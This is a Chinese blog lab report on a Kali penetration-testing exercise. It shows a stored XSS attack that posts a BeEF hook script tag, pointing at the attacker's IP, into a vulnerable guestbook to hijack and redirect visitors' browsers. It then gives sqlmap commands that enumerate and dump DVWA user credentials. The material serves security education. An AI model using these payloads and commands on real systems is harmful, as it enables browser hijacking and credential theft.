Kali网络渗透测试实验三——XSS和SQL注入

最新推荐文章于 2024-05-13 02:49:09 发布
最新推荐文章于 2024-05-13 02:49:09 发布
阅读量3.3k 收藏 37
点赞数 7
分类专栏: Kali网络渗透测试 文章标签: kali 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45746876/article/details/110069299
版权

XSS和SQL注入

前言

实验目的

实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。

系统环境:Kali Linux 2、Windows Server

网络环境:交换网络结构
实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA

XSS部分:利用Beef劫持被攻击者客户端浏览器

实验环境搭建

角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建)
攻击者:Kali(使用beEF生成恶意代码,并通过留言方式提交到留言簿网站);
被攻击者:访问留言簿网站,浏览器被劫持。

使用win2003server_IIS服务搭建纯在XSS漏洞的网站

参考:Windows Server 2003安装IIS服务并配置WEB站点

具体实现:

首先将实验三文件夹中的GuestBook文件夹复制到win2003server虚拟机(在此之前要先安装VMtools),然后找到IIS(路径为 开始->程序->管理工具->IIS),在IIS里添加网站,设置好IP、权限和端口等(见上面参考链接)之后,要在Web服务扩展中将 Active Server Pages 设置为允许(不一定是默认允许的),否则无法打开网站,见下图:

Active Server Pages禁止情况下:

在这里插入图片描述
Active Server Pages允许情况下:

在这里插入图片描述
这个问题也是困扰了本人很久,分享出来希望可以帮助到大家。

到此实验环境搭建就结束啦,不清楚的话可以欢迎在评论区或者私信与本人交流~

1.利用AWVS扫描留言簿网站,发现其存在XSS漏洞

利用AWVS扫描留言簿网站(安装见参考文档0.AWVS安装与使用.docx),发现其存在XSS漏洞,截图如下:

在这里插入图片描述
可以发现在erro.asp和add.asp里面都存在一个XSS漏洞:

在这里插入图片描述

2.Kali使用beef生成恶意代码

在kali里面打开beef

在这里插入图片描述
仿造上面的自己写一个:

<script src="http://Kali的ip:3000/hook.js"></script>

例如:

<script src="http://192.168.189.131:3000/hook.js"></script>

3.访问http://留言簿网站,将恶意代码写入网站留言板

在kali访问留言簿的网址留言:
在这里插入图片描述
那有的小伙伴可能就要问了,那为什么不直接在win2003的虚拟机上面留言呢?还得复制url到kali里面,多麻烦呀

原因:根据实际,正常来说,是无法直接使用开启网站服务的主机在自己的网站上留言恶意代码的,所以呀所以,在kali上面留言才更加实际一些嘛,听懂掌声~

留言完了记得在Firefox打开beef,账号密码默认都是beef(新版的好像不能直接使用默认账户密码,记得修改嗷)

然后在win2003这边查看留言并观察kali beef的变化:
在这里插入图片描述

可以看到好像多了一些东西(箭头所指),仔细一看,好家伙,好像是自己的……
在这里插入图片描述
之后再使用win10的物理机访问留言簿网站,然后再到kali beef里面查看变化:

在这里插入图片描述
确实是劫持到了自己的物理机……

在beef里可以查看到一些信息:

在这里插入图片描述
还可以指定劫持网站转为学校主页或者其他的网站(比如百度):

在beef内操作:

在这里插入图片描述
将劫持的网站转为百度:
在这里插入图片描述
物理机上浏览器的变化:
在这里插入图片描述
再试试转为学校主页叭:

在这里插入图片描述
物理机上面的变化:

在这里插入图片描述
这两个操作好像不能连续的进行,得在物理机上重新进一次留言网站才可以转到学校网站,不过还是很帅,有成功的惊艳到本小白哈哈

4.管理员登录login.htm,账号密码均为admin,审核用户留言

其实在上一步已经有啦,但是不能让标题空在这里,不然标题也会觉得孤独的。

在这里插入图片描述

5.回答问题

问题:实验中XSS攻击属于哪种类型?

答:本次实验中的XSS攻击属于存储型。

(转自:https://blog.csdn.net/qq_41783309/article/details/80615909

在这里插入图片描述

SQL注入部分:DVWA+SQLmap+Mysql注入实战

sqlmap语法参考

在这里插入图片描述
在这里插入图片描述

1.注入点发现

要进行SQL注入,首先肯定是要判断是否有注入漏洞。在dvwa(搭建好Metasplotiable 2之后获取ip,在浏览器上访问ip,就可以找到啦)上先将DVWA Security的Script Security等级改为low,如下图,原因后面会补充嗷~

在这里插入图片描述
然后在 SQL Injecttion的User ID 输入栏输入1,返回正常,再输入 1’ ,注意多了个单引号,报错,返回You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘‘1’’’ at line 1
此时可以断定有SQL注入漏洞。

在这里插入图片描述

输入1’ 以及报错返回:

在这里插入图片描述
同时也可以得到url: http://Metasplotiable 2的IP/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#

当然,还需要获取 cookie中的 PHPSESSID:在Firefox(google)中按F12,找到cookie,即可查看cookie,如下图:

在这里插入图片描述
接下来就可以进行SQL注入啦~

2.枚举当前使用的数据库名称和用户名

输入的命令:

sqlmap -u “http://Metasplotiable 2的IP/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=‘security=low;PHPSESSID=a00cdd0edd625af6fc0a6f27c8952be3’ -b --current-db --current-user

sqlmap输出:

在这里插入图片描述

3.枚举数据库用户名和密码

输入的命令:

sqlmap -u “http://Metasplotiable 2的IP/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=‘security=low;PHPSESSID=a00cdd0edd625af6fc0a6f27c8952be3’ --users --password

sqlmap输出:

在这里插入图片描述

4.枚举数据库

输入的命令:

sqlmap -u "Metasplotiable 2的IP/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=‘security=low; PHPSESSID=a00cdd0edd625af6fc0a6f27c8952be3’ --dbs

sqlmap输出:

在这里插入图片描述

5.枚举数据库和指定数据库的数据表

输入的命令:

sqlmap -u “Metasplotiable 2的IP/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=‘security=low;PHPSESSID=a00cdd0edd625af6fc0a6f27c8952be3’ -D dvwa --tables

sqlmap输出:

在这里插入图片描述

6.获取指定数据库和表中所有列的信息

输入的命令:

sqlmap -u “http://Metasplotiable 2的IP/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=‘security=low;PHPSESSID=a00cdd0edd625af6fc0a6f27c8952be3’ --string=“Surname” -D dvwa -T users --columns

sqlmap输出:

在这里插入图片描述

7.枚举指定数据表中的所有用户名与密码,并down到本地

输入的命令:

sqlmap -u “http://125.217.53.8/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=‘security=low;PHPSESSID=a00cdd0edd625af6fc0a6f27c8952be3’ -D dvwa -T users -C user,password --dump

sqlmap输出:
在这里插入图片描述
在此可以看到数据表中的所有用户名和密码以及down到本地的csv文件路径。

Tips:
带.的文件夹为隐藏,在图形命令下,用文件浏览器打开文件夹,按下ctrl+h组合键可显示隐藏文件合文件夹,再按一次取消显示。

查看本地的users.csv

可以此新建一个终端窗口,然后 cd 到dvwa文件夹,输入命令: ls -a ,可以查看当前文件夹包含的文件(包括隐藏文件),如下图:

在这里插入图片描述
然后输入命令 cat users.csv,就可以查看down本地的用户名和密码啦~

总结

这次的实验对我来说确实是有一些难度,不过好在社团的学习环境很棒,总是有大佬救我于水深火热之中,让我得以成功完成实验,在此感谢一波大佬们的帮助。

写的是实验报告,就不能像之前自己写的博客那样口水话一堆又一堆,可能看起来就没有那么好玩儿~ 也希望小榆不要觉得无聊哇。以后也会写出不枯燥又有内容的文章的,用心分享自己学到的东西。

每次写网络渗透测试实验总能感觉到自己很菜,发现又有很多东西不会,但是对自己狠一些总是能写完的,毕竟没有困难的工作,只有勇敢的打工人。

好啦,本篇文章到这里就结束啦,希望大家看完都能有所收获,有问题的话欢迎在评论区指正喔~

山野下
关注
  • 7
    点赞
  • 37
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
XSS漏洞(xss_and_mysql_file靶场实战)——渗透day10
qq_62716256的博客
09-07 1998
XSS漏洞(xss_and_mysql_file靶场实战)——day10
kali渗透学习-Web渗透XSS(一)
weixin_43239236的博客
01-23 575
XSS xss表示Cross Site Scripting(跨站脚本攻击),它与SQL注入攻击类似,SQL注入攻击中以SQL语句作为用户输入,从而达到查询/修改/删除数据的目的,而在xss攻击中,通过插入恶意脚本,实现对用户浏览器的控制。漏洞存在于服务器端,攻击对象为WEB客户端。【原理:为了使用户体验更好等因素,有部分代码会在浏览器中执行】 【JavaScript详解】:与java语言无关;命名完全出于市场原因,是使用最广的客户端脚本语言 使用场景:针对以下几个点位注入 直接嵌入html:<scr
实验三 XSSSQL注入
weixin_48647514的博客
12-14 166
实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。 系统环境:Kali Linux 2、Windows Server 网络环境:交换网络结构 实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA 实验步骤: XSS部分:利用Beef劫持被攻击者客户端浏览器。 实验环境搭建 角色:
Kali渗透测试之DVWA系列4——反射型XSS(跨站脚本攻击)
浅浅的博客
05-11 3947
目录 一、XSS 1、XSS简介 2、XSS类型 3、漏洞形成的根源 二、反射型XSS 1、原理示意图​ 2、实验环境 3、实验步骤 安全级别:LOW 重定向 获取cookie 安全级...
Kali Linux-网络安全之-XSS 跨站脚本攻击原理及 DVWA 靶机的搭建_kali实验xss攻击(1)
最新发布
2401_84545171的博客
05-13 1002
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。注:document.cookie 将以字符串的方式返回所有的 cookie,类型格式: cookie1=value;薪资区间6k-15k。即使您在 document.cookie 中写入一个完整的 cookie 字符串, 当您重新读叏该 cookie 信息时, cookie 信息是以键值对的形式展示的。
专业人士必知的渗透测试工具!
oldboyedu1的博客
11-11 556
该工具的作用是获取原始数据包并确定哪些主机在网络的特定段上可用,正在使用什么操作系统,以及识别特定主机的数据包防火墙或过滤器的不同类型和版本正在使用。Sqlmap,是非常有效的开源的SQL注入工具,并且自动化检测和利用SQL注入缺陷并接管数据库服务器的过程,就像它的网站所说的那样。Wireshark是一个无处不在的工具,可用于了解通过网络的流量。它可以用来确定数据库中的未知弱点,通过从传统字典中找到的复杂和流行的单词列表,获取文本字符样本,并用与正在生成的密码相同的格式,对其进行加密来达到目的。
web渗透测测试(sqlmap)
m0_58713554的博客
12-24 3316
通过分析靶机JLS02页面信息,寻找漏洞页面,将WEB服务存在SQL注入漏洞的页面名称作为Flag提交 Flag:index2.php 通过本地PC中的渗透测试平台KALI2020对靶机进行SQL注入攻击,获取靶机的数据库信息,将用来存放WEB服务的数据库名称作为FLAG提交 先随便输入点什么 sqlmap这个地址 sqlmap 使用注入语句结果如下 flag:webiu 3. 通过本地PC中的渗透测试平台KALI2020对靶机进行SQL注入攻击,获取靶机的数据库信息,将用...
网络渗透测试 XSSSQL注入
12-02
网络渗透测试 XSSSQL注入】的实验旨在深入理解网络安全中的两种常见攻击手法,并学习如何防范。XSS(跨站脚本攻击)和SQL注入都是针对Web应用的安全威胁,主要利用了程序处理用户输入的疏忽。 XSS攻击是攻击者...
web渗透测试详细入门实践课程-kali/sql注入
06-20
web渗透测试/渗透工具kali 渗透原理 渗透前期(网络踩点、网络扫描、网络查点) 渗透中期(利用漏洞信息进行渗透攻击、获取权限) 渗透后期(后渗透维持攻击、文件拷贝、代码植入、痕迹擦除) 渗透测试定义 渗透...
信安网络渗透测试实验三.docx
12-15
实验报告对 XSS 和 SQL 注入进行了详细的介绍和实验,从实验目的、实验内容、实验过程等方面进行了详细的介绍。实验结果表明,XSS 攻击和 SQL 注入攻击都是非常危险的攻击方式,需要我们采取相应的防御措施来防御...
Kali Linux渗透测试技术详解
02-19
Kali Linux渗透测试技术详解.pdf》这篇文档主要介绍了 Kali Linux 是一款渗透测试工具,用于测试网络和系统的安全性。该文档涵盖了 Kali Linux 的各个方面,包括安装、配置、测试和安全性建议等。 该文档的核心...
精通Kali Linux 高级渗透测试2023版本,英文原版
07-12
The COVID-19 pandemic has changed the way the world operates. Organizations of all sizes have transformed themselves from having none or partial remote working to all of their employees ...
Kali系统渗透靶机(物理机)的详细过程
哆啦A梦
03-21 6217
Kali系统渗透靶机
kali渗透技术实战——搭建渗透测试环境
weixin_54787877的博客
02-21 3728
如果想要了解系统的安全状况,那么可以进行渗透测试,找出系统中的漏洞,验证是否存在安全隐患。 渗透测试的含义不只是评估,它会用已发现的漏洞来进行测试,以验证该漏洞是真实存在还是只是虚惊一场(假阳性)。举个例子,审计或评估利用的是扫描工具,这些工具会显示多个系统上的数百个可能的漏洞。而渗透测试则会采用恶意黑客的惯用手段来尝试对这些漏洞进行攻击。这样可以验证哪些漏洞真实存在,从而可以将实际的系统漏洞数降至少量。最有效的渗透测试是那些针对特定系统的有特定目标的测试。质胜于量,这才是检验成功渗透测试的标准。在目标性攻
Kali Linux渗透测试技术详解_渗透测试入门
ZL_1618的博客
03-21 1440
Kali Linux作为攻击端,为了以后能模拟漏洞场景,我还装了一个Debian11的虚拟机,Debian 11是官网下载的镜像文件,在Vmware中安装的时候有图文提示,一路安装正常,也设置了普通用户和root的登录密码,默认安装成功进入了图形化界面,作为专业开发我肯定想让他进入命令行模式,我在图形登录界面试了一下Ctro+Alt+F1-F6试了一下,Ctro+Alt+F3进入命令行,然后切换到root用户。为了方便用户进行渗透方面的工作,有人将所有的工具都预装在一个Linux系统,其中。
实验二:网络嗅探与身份认证
ANYOUZHEN的博客
11-07 1142
它支持多种不同类型的系统架构,包括Unix、Linux、Windows、DOS模式、BeOS和OpenVMS,主要目的是破解不够牢固的Unix/Linux系统密码。了解了arp欺骗原理及危害,学习了钓鱼dns劫持,arp欺骗防范手段,以及密码设置的重要性,增强密码强度,最后个人感觉对wireshark抓包不够熟练,还得多加学习wireshark使用。John the Ripper免费的开源软件,是一个快速的密码破解工具,用于在已知密文的情况下尝试破解出明文的破解密码软件,支持大多数的。
小白学习kali linux day5(XSS漏洞学习)
Build20的博客
05-29 608
上图的beef-xss打开失败,可以给kali换源,执行vim /etc/apt/sources.list,再分别执行sudo apt-get update和sudo apt-get upgrade两个命令,我换的阿里源。然后执行apt remove beef-xss把beff-xss卸载,再apt-get install beef-xss执行重装。若忘记密码,则查看其配置文件:vim /etc/beef-xss/config.yaml /之后启动beef工具:绿色框框里为beef密码,可以为123.
sql注入实验
我了解豹女就像农民伯伯了解大米
02-24 1376
实验目的 使学员了解SQL注入的原理和利用方法 实验内容 实验靶机URL:http://10.110.2.145:8008/ 通过手工注入获取admin账户的密码 实验过程进行截图,要求必须要有payload和结果截图 实验过程截图 SQL手工注入 http://10.110.2.145:8008/article.php?id=1 and 1=1 #有回显 http://10.110.2.145:8008/article.php?id=1 and 1=2 #无...
SQL注入攻击的种类和防范手段
weixin_30342209的博客
07-04 57
观察近来的一些安全事件及其后果,安全专家们已经得到一个结论,这些威胁主要是通过SQL注入造成的。虽然前面有许多文章讨论了SQL注入,但今天所讨论的内容也许可帮助你检查自己的服务器,并采取相应防范措施。 SQL注入攻击的种类 知彼知己,方可取胜。首先要清楚SQL注入攻击有哪些种类。 1.没有正确过滤转义字符 在用户的输入没有为转义字符过滤时,就会发生...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值